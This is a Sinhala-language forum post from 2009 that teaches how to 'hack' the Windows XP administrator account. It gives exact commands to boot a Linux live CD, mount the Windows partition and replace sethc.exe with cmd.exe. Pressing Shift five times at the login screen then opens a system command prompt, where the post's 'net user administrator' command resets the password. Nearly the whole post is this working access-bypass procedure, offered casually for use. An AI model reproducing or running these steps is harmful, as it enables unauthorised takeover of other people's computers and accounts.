Windows XP -Administrator හැක් කරමු (new)

nlasasatha

Well-known member
  • Sep 2, 2009
    3,799
    1,581
    113
    Tsukuba
    Windows XP -Administrator හැක් කරමු (new)

    එලකිරි යාලුවන්ගේ ඉල්ලීම නිසා නැවත පල කරමි

    Windows XP -Administrator හැක් කරමු
    මේ දවස් වල නම් XP-administrator හැක් කරන්න ක්‍රම ගොඩක් තියෙනවා.
    අන්තර්ජාලය පිරික්සුවොත් හැක් කරන්න ඕන softwares ඕන තරම් තියෙනවා.

    software 1කින් හැක් කරාම කිසිම ආතල් එකක් නෑ..ඒක නිසා අපි වෙනස් විදිහකට මේක
    කරමු .



    මේවා තමයි ඕන කරන දෙවල්.

    1) pen එකක් හෝ linux(ubunt,kubuntu,slax,debian....etc) Live cd එකක්

    මෙන්න මෙහෙම කරන්නකො

    linux live cd එකින් පරිගණ්කය boot කරන්න
    linux os එකට log උනාට පස්සෙ terminal එක open කරන්න

    ඊට පස්සෙ පහත දක්වා ඇති command type කරන්න

    sudo mkdir /media/sda1
    sudo mount /dev/sda1 /media/sda1

    (කියන බැරි උනා sda1 කියන්න ඔයාලගෙ harddisk එකෙ primary partition එක)
    (sda1 හරියන්නෙ නැත්නම් sda2,sda3 ආකාරයට try කරන්න)

    දැන් මේක type කරන්න

    cd /media/sda1/
    cd WINDOWS/system32
    rm sethc.exe
    cp cmd.exe sethc.exe


    දැන් normal ආකරයට පරිගනකය on කරන්න
    ‍XP login screen එකේදි shift key එක 5 පාරක් ඔබන්න

    දැන් මතුවන CMD 1දි මේවා type කරන්න

    net user administrator asd

    දැන් administrator password එක asd කියල වෙනස් වෙලා තියෙවි

    asd වෙනුවට කැමති password එකක් යොදා ගන්න.



    මම වෙච්ච මහන්සියට ,ඔයාලත් එක්ක මේක බෙදා ගත්තට comment එකක්
    දාල යන්න අමතක කරන්න එපා.කැමති නම් rep එකකුත් දීගෙනම යන්න:rolleyes: